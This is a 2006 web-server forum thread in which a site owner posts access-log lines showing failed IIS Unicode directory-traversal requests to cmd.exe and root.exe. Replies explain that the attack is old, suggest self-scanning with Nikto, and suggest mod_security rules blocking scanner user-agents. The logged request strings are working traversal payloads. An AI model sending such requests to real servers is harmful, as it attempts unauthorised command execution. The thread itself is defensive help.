| Author |
|
rube2112
Joined: 15 Aug 2006
Posts: 3
|
 Posted: Tue 15 Aug '06 7:36 Post subject: Server Log entries ? |
 |
|
Can someone tell me exactly what this guy was trying to do? He didn't succeed but it worries me...thanks......Robb
218.92.92.248 - - [13/Aug/2006:21:01:54 -0400] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 1118
218.92.92.248 - - [13/Aug/2006:21:01:54 -0400] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 1118 "-" "-"
218.92.92.248 - - [13/Aug/2006:21:01:54 -0400] "GET /scripts/root.exe?/c+dir" 404 1118
218.92.92.248 - - [13/Aug/2006:21:01:54 -0400] "GET /scripts/root.exe?/c+dir" 404 1118 "-" "-"
218.92.92.248 - - [13/Aug/2006:21:01:55 -0400] "GET /msadc/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir" 404 1118
218.92.92.248 - - [13/Aug/2006:21:01:55 -0400] "GET /msadc/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir" 404 1118 "-" "-"
218.92.92.248 - - [13/Aug/2006:21:01:56 -0400] "GET /msadc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir" 404 1118
218.92.92.248 - - [13/Aug/2006:21:01:56 -0400] "GET /msadc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir" 404 1118 "-" "-" |
|
| Back to top |
|
James Blond
Moderator
Joined: 19 Jan 2006
Posts: 7294
Location: Germany, Next to Hamburg
|
| Posted: Tue 15 Aug '06 9:33 Post subject: |
|
|
| That was an attack for an IIS server. Don't worry. Apache is secure against this. |
|
| Back to top |
|
rube2112
Joined: 15 Aug 2006
Posts: 3
|
| Posted: Tue 15 Aug '06 21:26 Post subject: |
|
|
| Thanks......people never cease to amaze me. I have no idea what could possibly be enticing about our webserver. Thanks for the reply......Robb |
|
| Back to top |
|
ali_fareed
Joined: 04 Jul 2006
Posts: 61
Location: Bahrain
|
| Posted: Tue 15 Aug '06 22:17 Post subject: |
|
|
| The guy was trying a very old iis 5.0 unicode file traversal attack this attack has been fixed years ago but I can see other attacks maybe he is using a cgi vulnerablility scanner maybe nikto it's a nice idea to use such a scanner on yourself to find if you have vulnerabilities so that youcan fix them try using mod_security also it's very effective against such scanners many scanners have their name in their user-agents by default try using mod_security to block user-agents with strings like whisker , nikto and brutus this isn't foolproof but it should stop most script kiddies from scanning your site. |
|
| Back to top |
|
rube2112
Joined: 15 Aug 2006
Posts: 3
|
| Posted: Tue 15 Aug '06 23:18 Post subject: |
|
|
| My server and website is brand new. It hasn't been submitted to any search engines yet....the only thing I've done here lately is ban alot of bots from accessing. I'm wondering if I made the guy made by doing that or something. I don't even have iis installed.....Robb |
|
| Back to top |
|
ali_fareed
Joined: 04 Jul 2006
Posts: 61
Location: Bahrain
|
| Posted: Wed 16 Aug '06 2:18 Post subject: |
|
|
| well you dont have to submit your site to get people like that he may have scanned a range of addresses using a port scanner like nmap looking for webservers and he may have found you if you have a firewall that logs all tcp connections check it out it will show you a lot of info about the connection and he probably doesnt have a reason to try to attack your site he probably is bored and he wants to deface a site or maybe he is building a bot army for a ddos attack or something. |
|
| Back to top |
|
